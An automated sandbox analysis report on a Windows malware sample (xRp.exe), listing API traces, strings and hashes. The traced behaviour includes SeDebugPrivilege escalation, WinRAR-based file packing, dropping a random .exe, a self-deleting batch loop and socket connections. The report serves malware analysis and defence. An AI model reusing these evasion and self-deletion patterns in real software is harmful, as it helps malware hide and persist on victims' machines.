                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
                                      • API String ID: 75692138-1450390661
                                      • Opcode ID: 3ca90d9652a9e809526a8521b2d26dbe4f2774d4a257da2a1f0a21dff7dd3170
                                      • Instruction ID: 825f7b421bbd97c67a3348195bd1c3c1082dc8793887257e9f4789da7188053f
                                      • Opcode Fuzzy Hash: 3ca90d9652a9e809526a8521b2d26dbe4f2774d4a257da2a1f0a21dff7dd3170
                                      • Instruction Fuzzy Hash: A70124B1D00248FFDB11DFE4DD89AAEBBB9FB08306F104469E606A6251D7709F449F54
                                      APIs
                                      • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E13BC
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 004E13DA
                                      • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 004E1448
                                        • Part of subcall function 004E119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,?,?,004E13EF), ref: 004E11AB
                                        • Part of subcall function 004E119F: OpenProcessToken.ADVAPI32(00000000,00000028,004E13EF,?,?,?,?,?,?,004E13EF), ref: 004E11BB
                                        • Part of subcall function 004E119F: AdjustTokenPrivileges.ADVAPI32(004E13EF,00000000,?,00000010,00000000,00000000), ref: 004E11EB
                                        • Part of subcall function 004E119F: CloseHandle.KERNEL32(004E13EF), ref: 004E11FA
                                        • Part of subcall function 004E119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,004E13EF), ref: 004E1203
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E13A8
                                      • SeDebugPrivilege, xrefs: 004E13D3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$SeDebugPrivilege
                                      • API String ID: 4123949106-2008642442
                                      • Opcode ID: 73162040ba295be6b7cc1ee5c3e3311ef6d6ffe2798e6953619711cbecaed207
                                      • Instruction ID: b21467997745f33b8366a57d5144dd8bc079be13a6614cf0cfa89ba9a1dc38db
                                      • Opcode Fuzzy Hash: 73162040ba295be6b7cc1ee5c3e3311ef6d6ffe2798e6953619711cbecaed207
                                      • Instruction Fuzzy Hash: 8A316471E80289AAEF20DBA78C45FEFBBB8EB44706F10416BE505B3291D6345E45CB64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: memset$FileSleepwsprintf$CloseHandle$strrchr$DirectoryPointerRemoveSizeWritestrstr
                                      • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1773796546-2169341206
                                      • Opcode ID: c1678f9e6f916fcbdb579e0133362a78faa4617d74b6829b0b1244940992502f
                                      • Instruction ID: 782b20cfcdcd920572614da1dbe10f1b293a4ceb5d0e64896b2491c9f205d3f4
                                      • Opcode Fuzzy Hash: c1678f9e6f916fcbdb579e0133362a78faa4617d74b6829b0b1244940992502f
                                      • Instruction Fuzzy Hash: 7681D2B1504384BBD710DF62DC89FAB77ACEF84706F00092AF644D7191D7B89A498B6A
                                      APIs
                                      • memset.MSVCRT ref: 004E2766
                                      • memset.MSVCRT ref: 004E2774
                                      • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 004E2787
                                      • wsprintfA.USER32 ref: 004E27AB
                                        • Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894
                                      • wsprintfA.USER32 ref: 004E27C6
                                      • wsprintfA.USER32 ref: 004E27F4
                                        • Part of subcall function 004E1973: PathFileExistsA.SHLWAPI(\NN`NN,00000000,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 004E1992
                                        • Part of subcall function 004E1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 004E19BA
                                        • Part of subcall function 004E1973: Sleep.KERNEL32(00000064), ref: 004E19C6
                                        • Part of subcall function 004E1973: wsprintfA.USER32 ref: 004E19EC
                                        • Part of subcall function 004E1973: GetFileSize.KERNEL32(?,00000000), ref: 004E1A2C
                                        • Part of subcall function 004E1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004E1A46
                                        • Part of subcall function 004E1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004E1A65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: File$wsprintf$PathTimememsetrandsrand$AllocCreateExistsFolderReadSizeSleepSpecialSystemVirtual
                                      • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                      • API String ID: 842543849-3961832207
                                      • Opcode ID: 1ce5a2e6b3e05171c2b2466d9fe6213ff09869c3632e1f4c88c1c71c67514f08
                                      • Instruction ID: 3bf56bd169d2892b39eca13ae70b6d5419cfad1b8e51b3be0a0b8fc8e386c2e2
                                      • Opcode Fuzzy Hash: 1ce5a2e6b3e05171c2b2466d9fe6213ff09869c3632e1f4c88c1c71c67514f08
                                      • Instruction Fuzzy Hash: DF2158B6D402587BD711EBA69CCDFE7736CEB0474AF0005E6B644E3042E6B89F444A68
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,004E1400), ref: 004E1226
                                      • 6CC16DE0.KERNEL32(00000000,?,?,?,?,004E1400), ref: 004E122D
                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,004E1400), ref: 004E123F
                                      • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,004E1400), ref: 004E1250
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E129E
                                      • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E12B0
                                      • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\xRp.exe,?,?,?,?,004E1400), ref: 004E12F5
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,004E1400), ref: 004E130A
                                      Strings
                                      • ZwQuerySystemInformation, xrefs: 004E1212
                                      • ntdll.dll, xrefs: 004E1219
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 004E1262
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Virtual$FreeHandleProcess$AllocCloseCurrentModuleOpen
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe$ZwQuerySystemInformation$ntdll.dll
                                      • API String ID: 1236055466-3769353041
                                      • Opcode ID: 6380804735864a253ff78233ed43a412a2dbd43a621f9313a8772efb1deb38ed
                                      • Instruction ID: 87af08e0588fbfd93da62537dbd18c0378346613878ac30dc719f4a92622bf7f
                                      • Opcode Fuzzy Hash: 6380804735864a253ff78233ed43a412a2dbd43a621f9313a8772efb1deb38ed
                                      • Instruction Fuzzy Hash: 04210530644391ABD7219F56CC48F6BBAA8FB45B02F00096AF645FB250C374DA4087AD
                                      APIs
                                        • Part of subcall function 004E185B: GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1878
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1880
                                        • Part of subcall function 004E185B: srand.MSVCRT ref: 004E1890
                                        • Part of subcall function 004E185B: rand.MSVCRT ref: 004E1894
                                      • wsprintfA.USER32 ref: 004E15AA
                                      • wsprintfA.USER32 ref: 004E15C6
                                      • lstrlen.KERNEL32(?), ref: 004E15D2
                                      • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 004E1609
                                      • CloseHandle.KERNEL32(00000000), ref: 004E1612
                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004E162D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: FileTimerandsrandwsprintf$CloseExecuteHandleShellSystemWritelstrlen
                                      • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$open
                                      • API String ID: 1867526581-3117919743
                                      • Opcode ID: 3dcec1cff3763e342a0a9ad94320025a974d0d81ce8713a5bcc8c2a78cdc5409
                                      • Instruction ID: 10e66bc9d6bdd68753a019dacdef101b680414fcde42cbb97635a86c99c91d23
                                      • Opcode Fuzzy Hash: 3dcec1cff3763e342a0a9ad94320025a974d0d81ce8713a5bcc8c2a78cdc5409
                                      • Instruction Fuzzy Hash: B811A7729411687BD7219BA59C8DEEB7B6CDF49712F0000A2F549E3051DA749F848BB4
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,004E29DB,?,00000001), ref: 004E26A7
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,004E29DB,?,00000001), ref: 004E26B5
                                      • lstrlen.KERNEL32(?), ref: 004E26C4
                                      • ??2@YAPAXI@Z.MSVCRT ref: 004E26CE
                                      • lstrcpy.KERNEL32(00000004,?), ref: 004E26E3
                                      • lstrcpy.KERNEL32(?,00000004), ref: 004E271F
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004E272D
                                      • SetEvent.KERNEL32 ref: 004E273C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                      • String ID:
                                      • API String ID: 41106472-0
                                      • Opcode ID: 39454bfb4c35a1b99dff934470621d5c46b7feaa01bdd2cb9f0f4ef2c43268ca
                                      • Instruction ID: 06ee0f8d6bac8b9e4cb81f9602c82178c5fc4161509f4bf1cf8177b37acc1f96
                                      • Opcode Fuzzy Hash: 39454bfb4c35a1b99dff934470621d5c46b7feaa01bdd2cb9f0f4ef2c43268ca
                                      • Instruction Fuzzy Hash: 85118135500290EFCB229F5AEE88C6B7BADFBC47227104136F4548B221D7B48D85DB58
                                      APIs
                                      Strings
                                      • .exe, xrefs: 004E1C57
                                      • GDCKnTsbkBudQEhjqmjhJlOvyrOTnXZIUgpCNuVmsDpybvloXqHpKXUwOFMaSZYxtsMuzzJLkfFVHLLdrNUNtPAPxTcGxmISQFkaAgBlMfhHSWJRoRyiInBZdreQVetYwRzCqEoKabeWfYjwccGAiWiDgPEv, xrefs: 004E1B8A, 004E1B9C, 004E1C15, 004E1C49
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: lstrcatmemcpymemsetrandsrand
                                      • String ID: .exe$GDCKnTsbkBudQEhjqmjhJlOvyrOTnXZIUgpCNuVmsDpybvloXqHpKXUwOFMaSZYxtsMuzzJLkfFVHLLdrNUNtPAPxTcGxmISQFkaAgBlMfhHSWJRoRyiInBZdreQVetYwRzCqEoKabeWfYjwccGAiWiDgPEv
                                      • API String ID: 122620767-486614533
                                      • Opcode ID: 58b9f10d35c9c562c5c9a1f4fedb66789c47ef5f2d5d5c605c3de3485fda766a
                                      • Instruction ID: 9a591f7dee6a68bd1cca14824240c7137551db768e8a955483a04017e4c3e651
                                      • Opcode Fuzzy Hash: 58b9f10d35c9c562c5c9a1f4fedb66789c47ef5f2d5d5c605c3de3485fda766a
                                      • Instruction Fuzzy Hash: 9A214932E841D06ED2261337AC80F6A2B449FE3723F2540ABF5D54F2E3D17C0991926D
                                      APIs
                                      • memset.MSVCRT ref: 004E18B1
                                      • CloseHandle.KERNEL32(I%N), ref: 004E18E9
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004E18F0
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 004E1901
                                      • CloseHandle.KERNEL32(?), ref: 004E190A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: CloseHandle$CodeExitObjectProcessSingleWaitmemset
                                      • String ID: I%N
                                      • API String ID: 2982373586-4187869997
                                      • Opcode ID: 4f6aa2925a2f6d21a0b23ecde24b5c8bb5a81cad26e0aac2b2d44d0ada7717ca
                                      • Instruction ID: e070ff105b46812342e9ac568c299141268423e2314213a2074a78f3512f1779
                                      • Opcode Fuzzy Hash: 4f6aa2925a2f6d21a0b23ecde24b5c8bb5a81cad26e0aac2b2d44d0ada7717ca
                                      • Instruction Fuzzy Hash: 6201B172900168BBCB21AF92DC4CDEF7F3DEF85331F104022F915A61A5C2754A18CAA4
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 004E1334
                                      • 6CC16DE0.KERNEL32(00000000), ref: 004E133B
                                      • memset.MSVCRT ref: 004E1359
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: HandleModulememset
                                      • String ID: NtSystemDebugControl$ntdll.dll
                                      • API String ID: 1044559590-2438149413
                                      • Opcode ID: 43e19689bde84019883349af687d88e33d6a093441340bdbc435665de83ed6c2
                                      • Instruction ID: db53836fe249b4aae4fd8ffd55fafb9078964cf5a9d1d44d7996d3ee3732d158
                                      • Opcode Fuzzy Hash: 43e19689bde84019883349af687d88e33d6a093441340bdbc435665de83ed6c2
                                      • Instruction Fuzzy Hash: AB01A171640389EFEB11DFA6ECC8A6FBB68FB41306F00057BF901A6551D2748605CA59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: strrchr$lstrcmpilstrcpylstrlen
                                      • String ID:
                                      • API String ID: 3636361484-0
                                      • Opcode ID: f15421baf578484a6de39fc6a0453359a50713b2fda7268a1977d24458829afd
                                      • Instruction ID: 253d107374bdef1af40673ce684b093ba953044a2275cf81d7f372c14e94d1c9
                                      • Opcode Fuzzy Hash: f15421baf578484a6de39fc6a0453359a50713b2fda7268a1977d24458829afd
                                      • Instruction Fuzzy Hash: 1201DB729042956FDB115B64DC48BD777DCDB04312F040477F945D7091D6789E848B98
                                      APIs
                                      • GetSystemTimeAsFileTime.KERNEL32(004E1F92,00000000,?,00000000,?,?,?,004E1F92,?,00000000,00000002), ref: 004E1867
                                      • srand.MSVCRT ref: 004E1878
                                      • rand.MSVCRT ref: 004E1880
                                      • srand.MSVCRT ref: 004E1890
                                      • rand.MSVCRT ref: 004E1894
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: Timerandsrand$FileSystem
                                      • String ID:
                                      • API String ID: 4106363736-0
                                      • Opcode ID: d604940b90ab14632071e5e6f78235091b97c67fc2e4ff8e52dd1c367726a13c
                                      • Instruction ID: 7844f533dcc1dcafc11a8cf9c38af7dc3cc6de340ac8277b50dc9087b3f664e9
                                      • Opcode Fuzzy Hash: d604940b90ab14632071e5e6f78235091b97c67fc2e4ff8e52dd1c367726a13c
                                      • Instruction Fuzzy Hash: B6E0D877A00218BBD700ABF9EC8A89EBBACDF84162B100537F600D3255E570FD448BB8
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004E603C
                                      • 6CC16DE0.KERNEL32(00000000,004E6064), ref: 004E604F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1855595085.00000000004E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 004E0000, based on PE: true
                                      • Associated: 00000001.00000002.1855462829.00000000004E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855478330.00000000004E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855560821.00000000004E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000001.00000002.1855578264.00000000004E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4e0000_xRp.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID: kernel32.dll
                                      • API String ID: 4139908857-1793498882
                                      • Opcode ID: 3921539fa191f55cf1e8754c8e12e2030db961ee0a7cdae8a9294f184cb273b5
                                      • Instruction ID: 6b98c7ac211e0c3ecb2654d8ef692e2fd5354cb25a1ce9647a1134942f7cbf53
                                      • Opcode Fuzzy Hash: 3921539fa191f55cf1e8754c8e12e2030db961ee0a7cdae8a9294f184cb273b5
                                      • Instruction Fuzzy Hash: 03F0C2B11402998BDF70CE65CC44BDE37E4EB15751F50042BE909CB282CB3886058B19

                                      Execution Graph

                                      Execution Coverage:1.4%
                                      Dynamic/Decrypted Code Coverage:3.3%
                                      Signature Coverage:0%
                                      Total number of Nodes:209
                                      Total number of Limit Nodes:34
                                      execution_graph 24642 b2bd30 RtlAllocateHeap 24340 1050000 24342 1050044 GetPEB 24340->24342 24343 1050077 CreateFileA 24342->24343 24345 105022d 24343->24345 24349 acd620 WSAStartup 24350 acd658 24349->24350 24354 acd716 24349->24354 24351 acd6e4 socket 24350->24351 24350->24354 24352 acd6fa connect 24351->24352 24351->24354 24353 acd70c closesocket 24352->24353 24352->24354 24353->24351 24353->24354 24355 561086d GetCurrentHwProfileW 24645 acdb20 6 API calls 24627 56105ee GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 24358 56108f7 24359 5610900 24358->24359 24360 56108df GetCurrentHwProfileW 24358->24360 24360->24359 24646 ab8b00 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24408 5610618 GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 24521 b95908 24522 b9591b ___std_exception_copy 24521->24522 24527 b957e3 24522->24527 24524 b95927 24534 b911fc RtlAllocateHeap ___std_exception_copy 24524->24534 24526 b95933 24528 b957ef std::_Locinfo::_Locinfo_ctor 24527->24528 24529 b957f9 24528->24529 24530 b9581c 24528->24530 24549 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24529->24549 24532 b95814 24530->24532 24535 b9587a 24530->24535 24532->24524 24534->24526 24536 b958aa 24535->24536 24537 b95887 24535->24537 24539 b958a2 24536->24539 24540 b922f1 4 API calls 24536->24540 24561 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24537->24561 24539->24532 24541 b958c2 24540->24541 24550 ba3b0d 24541->24550 24544 ba2ca2 RtlAllocateHeap 24545 b958d6 24544->24545 24554 ba175f 24545->24554 24549->24532 24551 ba3b24 24550->24551 24553 b958ca 24550->24553 24551->24553 24563 ba3ad3 RtlAllocateHeap __dosmaperr 24551->24563 24553->24544 24555 ba1788 24554->24555 24558 b958dd 24554->24558 24556 ba17d7 24555->24556 24559 ba17af 24555->24559 24568 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24556->24568 24558->24539 24562 ba3ad3 RtlAllocateHeap __dosmaperr 24558->24562 24564 ba16ce 24559->24564 24561->24539 24562->24539 24563->24553 24565 ba16da std::_Locinfo::_Locinfo_ctor 24564->24565 24566 ba1719 24565->24566 24569 ba1832 24565->24569 24566->24558 24568->24558 24570 ba7400 RtlAllocateHeap 24569->24570 24571 ba1842 24570->24571 24573 ba7400 RtlAllocateHeap 24571->24573 24578 ba1848 24571->24578 24580 ba187a 24571->24580 24575 ba1871 24573->24575 24574 ba7400 RtlAllocateHeap 24576 ba1886 FindCloseChangeNotification 24574->24576 24577 ba7400 RtlAllocateHeap 24575->24577 24576->24578 24577->24580 24581 ba736f RtlAllocateHeap __dosmaperr 24578->24581 24579 ba18a0 24579->24566 24580->24574 24580->24578 24581->24579 24623 b99e88 SetFilePointerEx WriteFile RtlAllocateHeap RtlAllocateHeap ___std_exception_copy 24584 b92080 24587 b91fbe 24584->24587 24586 b92092 24589 b91fca std::_Locinfo::_Locinfo_ctor 24587->24589 24588 b91fd1 24605 b99f5f RtlAllocateHeap __dosmaperr 24588->24605 24589->24588 24591 b91ff1 24589->24591 24594 b92003 24591->24594 24595 b91ff6 24591->24595 24592 b91fd6 24606 b914c0 RtlAllocateHeap ___std_exception_copy 24592->24606 24601 ba33a8 24594->24601 24607 b99f5f RtlAllocateHeap __dosmaperr 24595->24607 24598 b9200c 24600 b91fe1 24598->24600 24608 b99f5f RtlAllocateHeap __dosmaperr 24598->24608 24600->24586 24602 ba33b4 std::_Lockit::_Lockit std::_Locinfo::_Locinfo_ctor 24601->24602 24609 ba344c 24602->24609 24604 ba33cf 24604->24598 24605->24592 24606->24600 24607->24600 24608->24600 24613 ba346f 24609->24613 24611 ba34d0 24619 ba3ad3 RtlAllocateHeap __dosmaperr 24611->24619 24613->24613 24614 ba34b5 24613->24614 24615 ba3113 24613->24615 24614->24604 24618 ba3120 __dosmaperr std::_Facet_Register 24615->24618 24616 ba314b RtlAllocateHeap 24617 ba315e __dosmaperr 24616->24617 24616->24618 24617->24611 24618->24616 24618->24617 24619->24614 24651 ac4560 GetPEB RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24362 5610638 GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 24366 b179d0 24367 b17a17 24366->24367 24370 b179e8 std::locale::_Setgloballocale 24366->24370 24371 b1acb0 24367->24371 24369 b17a2a 24372 b1acd5 24371->24372 24373 b1adfc 24371->24373 24376 b1ad43 24372->24376 24377 b1ad36 24372->24377 24379 b1acea 24372->24379 24394 ab2040 RtlAllocateHeap RtlAllocateHeap std::locale::_Setgloballocale 24373->24394 24375 b1ae01 24395 ab1fa0 RtlAllocateHeap RtlAllocateHeap Concurrency::cancel_current_task 